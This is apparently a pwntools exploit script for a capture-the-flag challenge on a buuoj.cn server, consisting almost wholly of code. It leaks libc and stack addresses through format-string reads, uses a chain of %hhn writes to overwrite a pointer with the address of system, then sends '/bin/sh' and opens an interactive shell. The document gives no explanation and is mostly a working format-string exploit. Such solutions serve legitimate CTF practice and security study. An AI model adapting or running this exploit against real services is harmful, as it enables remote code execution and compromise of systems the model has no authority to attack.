1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95
| from pwn import * import time
p = remote('node4.buuoj.cn',25845) libc = ELF('./libc-2.27_x32.so') p.sendlineafter('name:','aa') p.sendlineafter('password:','%15$p')
p.recvuntil('0x')
__libc_start_main = int(p.recvuntil('\n',drop=True),16)-0xf1 libc_base = __libc_start_main - libc.symbols['__libc_start_main'] print('libc_base-->'+hex(libc_base)) system = libc_base + libc.sym['system'] print('system-->'+hex(system))
p.sendlineafter('Try again!','%6$p') p.recvuntil('0x') strack_addr0 = int(p.recvuntil('\n',drop=True),16) print('strack_addr0-->'+hex(strack_addr0))
p.sendlineafter('Try again!','%10$p') p.recvuntil('0x') strack_addr1 = int(p.recvuntil('\n',drop=True),16) print('strack_addr1-->'+hex(strack_addr1))
cmd = 'b *0x08048575\n'
payload = '%'+str(0x14)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload)
payload1 = '%'+str((strack_addr1 & 0xff)+1)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload1)
payload2 = '%'+str(0xb0)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload2)
payload3 = '%'+str((strack_addr1 & 0xff)+2)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload3)
payload4 = '%'+str(0x04)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload4)
payload5 = '%'+str((strack_addr1 & 0xff)+3)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload5)
payload6 = '%'+str(0x08)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload6)
strack_addr1 = strack_addr1 + 4 payload1 = '%'+str(strack_addr1 & 0xff)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload1)
payload2 = '%'+str(0x15)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload2)
payload3 = '%'+str((strack_addr1 & 0xff)+1)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload3)
payload4 = '%'+str(0xb0)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload4)
payload5 = '%'+str((strack_addr1 & 0xff)+2)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload5)
payload6 = '%'+str(0x04)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload6)
payload7 = '%'+str((strack_addr1 & 0xff)+3)+'c'+'%6$hhn' p.sendlineafter('Try again!\n',payload7)
payload8 = '%'+str(0x08)+'c'+'%10$hhn' p.sendlineafter('Try again!\n',payload8)
payload = '%'+str(system & 0xff)+'c'+'%14$hhn'
payload += '%'+str(((system & 0xffff00)>>8)-0x10)+'c'+'%15$hn' print(hex(((system & 0xffff00)>>8)-0x10)) p.sendlineafter('Try again!\n',payload)
time.sleep(0.5)
p.sendline('/bin/sh')
p.interactive()
|